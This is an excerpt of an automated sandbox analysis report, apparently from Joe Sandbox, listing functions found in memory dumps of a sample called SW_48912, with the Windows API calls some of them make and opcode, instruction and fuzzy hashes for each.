                                                                                                                      • Instruction ID: efcf42ca4e211062155695be5e93e3705ed05677b4546768907559c52c0711e0
                                                                                                                      • Opcode Fuzzy Hash: 86b3e89e1a19165d980b855f3ba82c280dcf591342a80cd9abaaa2c1ef3cc731
                                                                                                                      • Instruction Fuzzy Hash: 56110FB5C003498FCB10DF9AD844A9EFBF5AB89324F10841AD819A7250C375A545CFA1
                                                                                                                      Function 06F82CF8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 06F83495
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2538663250-0
                                                                                                                      • Opcode ID: b371a20b2c01a024ce20e6ead6d97c98bab69ad81c79e62153a5fd97f982b6d8
                                                                                                                      • Instruction ID: fd66133575046f9e1805ece3927eacf4b6b0ce650f5fb4d69e7f7d25aa6d84d7
                                                                                                                      • Opcode Fuzzy Hash: b371a20b2c01a024ce20e6ead6d97c98bab69ad81c79e62153a5fd97f982b6d8
                                                                                                                      • Instruction Fuzzy Hash: 4A1115B18003488FDB50EF9AC449B9EFFF4EB48724F208459D559A7211C375A944CFA5
                                                                                                                      Function 06F83438 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 06F83495
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2538663250-0
                                                                                                                      • Opcode ID: 9d4c23dbfbd4b594e8a147b2513744d27d6a534d58f3723ed4c4b2e0ae2de08c
                                                                                                                      • Instruction ID: 5ceaf093ef0bb531c4e7170b638dd06d1cdc5b4f250493e12ba22ac2c37d22b3
                                                                                                                      • Opcode Fuzzy Hash: 9d4c23dbfbd4b594e8a147b2513744d27d6a534d58f3723ed4c4b2e0ae2de08c
                                                                                                                      • Instruction Fuzzy Hash: 4B1112B6C003488FCB10EF99D989BDEBFF8AB48320F20845AD519A3611C379A544CFA1
                                                                                                                      Function 06F84160 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 06F841BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 410705778-0
                                                                                                                      • Opcode ID: d7ac956ee33cce621376c6c00ac34b41f0cef234323462332853f35addfa6fc1
                                                                                                                      • Instruction ID: 738bcc8430e87f5d33b8d10e0cd961f710fe6386bac576579f3d926ecd7b7a19
                                                                                                                      • Opcode Fuzzy Hash: d7ac956ee33cce621376c6c00ac34b41f0cef234323462332853f35addfa6fc1
                                                                                                                      • Instruction Fuzzy Hash: 8D1112B58003499FDB10DF9AC889BDFFBF8EB48320F10845AE918A3210C375A954CFA1
                                                                                                                      Function 06B82CB8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*&/)(#$^@!~-_
                                                                                                                      • API String ID: 0-3325533558
                                                                                                                      • Opcode ID: f954ee762dfea486bee2611838d9f7e690893f75db315767c421cb9fcdd60805
                                                                                                                      • Instruction ID: 0905a92170e6ca335f9b2d773b95ee9df60f07156ea4e2f88850dfb76dd7952f
                                                                                                                      • Opcode Fuzzy Hash: f954ee762dfea486bee2611838d9f7e690893f75db315767c421cb9fcdd60805
                                                                                                                      • Instruction Fuzzy Hash: 7B51E271B002149FD710BBB8D444BAE7BB2FF88300F0488A9D9955B399CF756D48C781
                                                                                                                      Function 06B82CB4 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*&/)(#$^@!~-_
                                                                                                                      • API String ID: 0-3325533558
                                                                                                                      • Opcode ID: df41105bd9f4746aa4dbf6c752285876ebeb60845468db3e194a6c5162d3ba81
                                                                                                                      • Instruction ID: a0aa323c3b02b9f815449e3b31a0da733136d6f8df549814d4ffed4e06d6add1
                                                                                                                      • Opcode Fuzzy Hash: df41105bd9f4746aa4dbf6c752285876ebeb60845468db3e194a6c5162d3ba81
                                                                                                                      • Instruction Fuzzy Hash: BE51D171B00254AFD710BBA4D445BAEBBB2FF88300F0488A9D9955B399CF756E49C781
                                                                                                                      Function 06B8A107 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 771f31caa3d739161171b796d7616591aac592d63b0c5e18f47e08d7053dbfe1
                                                                                                                      • Instruction ID: 976fad895b1e05c11c1709d5008f92dbfa5242becd6d076bb218a812b64edbc5
                                                                                                                      • Opcode Fuzzy Hash: 771f31caa3d739161171b796d7616591aac592d63b0c5e18f47e08d7053dbfe1
                                                                                                                      • Instruction Fuzzy Hash: 2F31DFB4E04218CFDB44DFA9C4809EDFBB6AF4D310F10916AE919A7261D735A941CF90
                                                                                                                      Function 06B8A122 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 60c8f538c400143add9a9505e2daa8747e14a0104b2425effa3920566ff5d8a0
                                                                                                                      • Instruction ID: 8e65c9d69dc2dc7ed5182db1fce0d902901296a504ee4f478705a3acf8f8d065
                                                                                                                      • Opcode Fuzzy Hash: 60c8f538c400143add9a9505e2daa8747e14a0104b2425effa3920566ff5d8a0
                                                                                                                      • Instruction Fuzzy Hash: A231E3B4E05218DFDB44EFA9C484AADFBB6FF49300F10906AE909AB255C7319945CF90
                                                                                                                      Function 06B8A088 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 564968f7d8271a5ec4c9d948a4c1827590098df5b5f9841ae11ad522663dea4d
                                                                                                                      • Instruction ID: b131eb7aff5da8ad921395c2bc751e905fa3be18d175df85a35b048d49c5c909
                                                                                                                      • Opcode Fuzzy Hash: 564968f7d8271a5ec4c9d948a4c1827590098df5b5f9841ae11ad522663dea4d
                                                                                                                      • Instruction Fuzzy Hash: 042106B1D046088BDB58DFEAC9556DEFBF6AF89300F14C02AD415AB358EB741946CB90
                                                                                                                      Function 06B8A098 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 1474ca65842c7571f0e36c9ac83a5fdd4a947196deb6399e5c99230c4a4f93bf
                                                                                                                      • Instruction ID: c694600eaf4b46f793fc459dee6d0a8ab734c14c4ad62511bffc5355d2e8d3fe
                                                                                                                      • Opcode Fuzzy Hash: 1474ca65842c7571f0e36c9ac83a5fdd4a947196deb6399e5c99230c4a4f93bf
                                                                                                                      • Instruction Fuzzy Hash: ED11C3B0E046488BDB58DFEAC5546EEFFF6AF89300F14C06AC415AB358DB741946CB90
                                                                                                                      Function 06B8A180 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: f6bf28ae6425aa02bfafbfc6e207df98b1e7150cc15dda89d8558528ae9ab747
                                                                                                                      • Instruction ID: a25ffee5cbd4dfe7201b682cf037b77f566e6d8c8b81bcfc602c0d8d15c7fe19
                                                                                                                      • Opcode Fuzzy Hash: f6bf28ae6425aa02bfafbfc6e207df98b1e7150cc15dda89d8558528ae9ab747
                                                                                                                      • Instruction Fuzzy Hash: 38119079E002499FCF08CFE8C4949ADFBB2FF48310F10816AE919AB265D7316945CF80
                                                                                                                      Function 06B80EA8 Relevance: .2, Instructions: 224COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 762a1cfbe4ab807603356a97e72d64f280e5788e262af58f3e9da043a02a3b1e
                                                                                                                      • Instruction ID: 43d8fe1fb7ea59c997010244cab0d8c79e3ca87da524faf969a854fea6b10e82
                                                                                                                      • Opcode Fuzzy Hash: 762a1cfbe4ab807603356a97e72d64f280e5788e262af58f3e9da043a02a3b1e
                                                                                                                      • Instruction Fuzzy Hash: 98A1C375910619CFDB50EF68C840A98FBB1FF49304F05C699E949BB315EB30AA89CF90
                                                                                                                      Function 06B87680 Relevance: .2, Instructions: 171COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 66ab7ec498ffea7dd7f6e74f9c5afe8c918865718a52732cd41e62f14924e7e6
                                                                                                                      • Instruction ID: bb26eb965acd761f0d19a1e0af2e29245790b49b3e5470262b78e00dbc494b91
                                                                                                                      • Opcode Fuzzy Hash: 66ab7ec498ffea7dd7f6e74f9c5afe8c918865718a52732cd41e62f14924e7e6
                                                                                                                      • Instruction Fuzzy Hash: CF5103F5F14215DFE790AB29C841BBEB7A2EF85315F3480B6E4159B291DE34C841C7A2
                                                                                                                      Function 06B8659C Relevance: .2, Instructions: 171COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 092109d6bd3fc79f812b2a8a4ae65ce170500a216cd96ac6f5e04b27aec47920
                                                                                                                      • Instruction ID: 4fdc8486c6aa4ee89f1846fabdfaf490d0214bbf46d2f8d0e01b2782e8a2c408
                                                                                                                      • Opcode Fuzzy Hash: 092109d6bd3fc79f812b2a8a4ae65ce170500a216cd96ac6f5e04b27aec47920
                                                                                                                      • Instruction Fuzzy Hash: DA51B7F4E012189FEB40AFA9D9517BEBBB2BF44700F108066E951AB3C9E7349D41CB91
                                                                                                                      Function 06B80E9C Relevance: .2, Instructions: 164COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c0646a44eaf48824623d6eb66296d65133ae23ea81287a6519c886824b96724c
                                                                                                                      • Instruction ID: d723b3404fbcf629557932578efeefaae361b4c622166c228ebef9e13f3ff8cb
                                                                                                                      • Opcode Fuzzy Hash: c0646a44eaf48824623d6eb66296d65133ae23ea81287a6519c886824b96724c
                                                                                                                      • Instruction Fuzzy Hash: 31710575910619CFDB50EF68C880A99FBB1FF49314F05C299E549BB315EB30AA89CF90
                                                                                                                      Function 06B85358 Relevance: .1, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a0c447a287ac25401137904790ab293714a7a118f945ac1a819644809168262a
                                                                                                                      • Instruction ID: 87a18b888072ca1485b7d76b36f304ecfd5a8b0a06dcf8af44c1bedb1e993c77
                                                                                                                      • Opcode Fuzzy Hash: a0c447a287ac25401137904790ab293714a7a118f945ac1a819644809168262a
                                                                                                                      • Instruction Fuzzy Hash: AB31E5F2D04615CFDBF4AB68C8012BEB6B5EF84201F0485A7D0A7D7295D7789850C792
                                                                                                                      Function 06B82EEE Relevance: .1, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9406e5fdc7328c4499969c55d432d7c0021d249e2262084efb15faebdcac26ee
                                                                                                                      • Instruction ID: 6be963996052059bb8c3e29f6cc56473b9cd3c2d4e7fc1be9e3040c44c190d7b
                                                                                                                      • Opcode Fuzzy Hash: 9406e5fdc7328c4499969c55d432d7c0021d249e2262084efb15faebdcac26ee
                                                                                                                      • Instruction Fuzzy Hash: 4B31C5B1A093918FC716AB75D85C16D7FF1EF46202B0444D7E492CB29ACB7D8C85CBA1
                                                                                                                      Function 06B85E60 Relevance: .1, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ab7a02752a67f6690a4d34c84be4635f850dd38b8cfe6dce818b45ede3c7aa11
                                                                                                                      • Instruction ID: 8d08e222379e429c2dbde57a39b7ce21a38535322da34f8ef1315a640fd28c88
                                                                                                                      • Opcode Fuzzy Hash: ab7a02752a67f6690a4d34c84be4635f850dd38b8cfe6dce818b45ede3c7aa11
                                                                                                                      • Instruction Fuzzy Hash: EC313AB2910248AFCB54DFA9D884ADEBFF9FB48310F10806AE519E7211D774A940CFA0
                                                                                                                      Function 06B8B9B0 Relevance: .1, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 518f9c248a6aec4fd43c6572cf907e6a78a022917e6c2acc6dd0eee0e33e247e
                                                                                                                      • Instruction ID: 4f818cbc858111fd4fcf82a4638daac0b922e2500f1b6ae879229d997fcc8f83
                                                                                                                      • Opcode Fuzzy Hash: 518f9c248a6aec4fd43c6572cf907e6a78a022917e6c2acc6dd0eee0e33e247e
                                                                                                                      • Instruction Fuzzy Hash: EE3111B0E05208DFDB44DFAAC5849EEBBF6EF89311F1490A9D509A7211DB349981CFA0
                                                                                                                      Function 06B87670 Relevance: .1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 140f72a8cc387043e4fc9508aa01a49578cda30ff90a2b8d5edb6a7467d22c08
                                                                                                                      • Instruction ID: 3b8149d8cd7474db68012b27bf66546216c02cd9252914598c92e6303d39c99f
                                                                                                                      • Opcode Fuzzy Hash: 140f72a8cc387043e4fc9508aa01a49578cda30ff90a2b8d5edb6a7467d22c08
                                                                                                                      • Instruction Fuzzy Hash: DD21B1B5A08115CFE740AB6DC841ABEF7A6EB85318F2481B7A425D7291DB34C441C791
                                                                                                                      Function 06B82F28 Relevance: .1, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c72726e2c94ecf295fbcc4f475056676846a9f22315f125af63fc762c199bc3c
                                                                                                                      • Instruction ID: 97e850b395ce51cc57d4fa560fa2269af1a24afdcbed6bea7683766a83012507
                                                                                                                      • Opcode Fuzzy Hash: c72726e2c94ecf295fbcc4f475056676846a9f22315f125af63fc762c199bc3c
                                                                                                                      • Instruction Fuzzy Hash: 312175B1A00215CFC714AF79E45C52E7BE6FF8830271484A6E416DB399DB798C81CBA1
                                                                                                                      Function 022FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1535dacc11a92b88957297e1871c18b5ef3143194c9c6a57a928c9ff4870942c
                                                                                                                      • Instruction ID: f57052d340ee369f9ae82df0fe0c3a9306de6d26f0cb6174714833f0e662939c
                                                                                                                      • Opcode Fuzzy Hash: 1535dacc11a92b88957297e1871c18b5ef3143194c9c6a57a928c9ff4870942c
                                                                                                                      • Instruction Fuzzy Hash: 632145B1510201DFDB45DF54C9C0B26FFA5FB88328F20C579EA0A0B24AC336D416CBA2
                                                                                                                      Function 022FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a99b1b034c4fef78385fbcf99ffeb999aae5b36ad8dddc1e020af51b9bf78ba0
                                                                                                                      • Instruction ID: 1dcba23b39a615482ea872e09ab3efe917a1e125be27b7fd637907fbfb16894e
                                                                                                                      • Opcode Fuzzy Hash: a99b1b034c4fef78385fbcf99ffeb999aae5b36ad8dddc1e020af51b9bf78ba0
                                                                                                                      • Instruction Fuzzy Hash: 4D2148B5510205DFDB09DF44C9C4B16FFA5FB94324F20C578DA0A0B24AC336E416CBA1
                                                                                                                      Function 06B86B20 Relevance: .1, Instructions: 72COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d7e883480eca6bc90a2b71179bccf4ebaf5ca5937791ab6549c25bc0c11542f7
                                                                                                                      • Instruction ID: 5f473eaa057334a7f5472be9677e891bd27497d4cf07d20fd9637077f39760bf
                                                                                                                      • Opcode Fuzzy Hash: d7e883480eca6bc90a2b71179bccf4ebaf5ca5937791ab6549c25bc0c11542f7
                                                                                                                      • Instruction Fuzzy Hash: 042103726040198FEB84AEADDC027BBB7E5FB48318F0041B7B412CB2A0F238C951D391
                                                                                                                      Function 0230D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919699013.000000000230D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0230D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_230d000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 409a1656c675ffff621f397d73bd3d0b1b692a7896d4b93ded4b43964b04e587
                                                                                                                      • Instruction ID: b9cc823d35d57f4210a394664948b547e25403a517d527aba3bc810caa912ce6
                                                                                                                      • Opcode Fuzzy Hash: 409a1656c675ffff621f397d73bd3d0b1b692a7896d4b93ded4b43964b04e587
                                                                                                                      • Instruction Fuzzy Hash: 0021F571614308EFDB05DF94D9D4B26BBE9FB88314F24C66DE80A4B692C336D816CA71
                                                                                                                      Function 0230D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919699013.000000000230D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0230D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_230d000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a8e32b9f6acee693f54b6b9cff5bbe6a8d9017972c017b7b30c895c5be86b77
                                                                                                                      • Instruction ID: d0543e9c03c35dd05a57d232ef84e6925a98515d593c42eba1b39bba0262458c
                                                                                                                      • Opcode Fuzzy Hash: 1a8e32b9f6acee693f54b6b9cff5bbe6a8d9017972c017b7b30c895c5be86b77
                                                                                                                      • Instruction Fuzzy Hash: 2021D0B5604208EFDB14DF54D9D4F26BBA5FB84324F24C969D80E4B686C33AD807CA71
                                                                                                                      Function 06B877D9 Relevance: .1, Instructions: 66COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 57346d295114d7be4868b778e1402e10c6f9fc29e2ec8b3ef448d4f11da62910
                                                                                                                      • Instruction ID: 7a4eba421e0b261d83bc3628bdcbefc989f677367280f974dcab7ad846a7d647
                                                                                                                      • Opcode Fuzzy Hash: 57346d295114d7be4868b778e1402e10c6f9fc29e2ec8b3ef448d4f11da62910
                                                                                                                      • Instruction Fuzzy Hash: DE11E9B0F54200DFE7549B26C945B6D77A2EF81706FB581F6E5165F2A1CE308841C7E2
                                                                                                                      Function 06B831AE Relevance: .1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02847ee461f92563130cce7c2ff7ea9a129c593d760d862ac011548168b6c8bd
                                                                                                                      • Instruction ID: c129a8c4d5a767da36d65b6e93fd387d05f38b7bd83e3079846971aa48561903
                                                                                                                      • Opcode Fuzzy Hash: 02847ee461f92563130cce7c2ff7ea9a129c593d760d862ac011548168b6c8bd
                                                                                                                      • Instruction Fuzzy Hash: 9521AEF2904525CEEBA0AFE9C8002BEF3F1FB00F05F048556E16297290C738D551C69A
                                                                                                                      Function 06B83224 Relevance: .1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
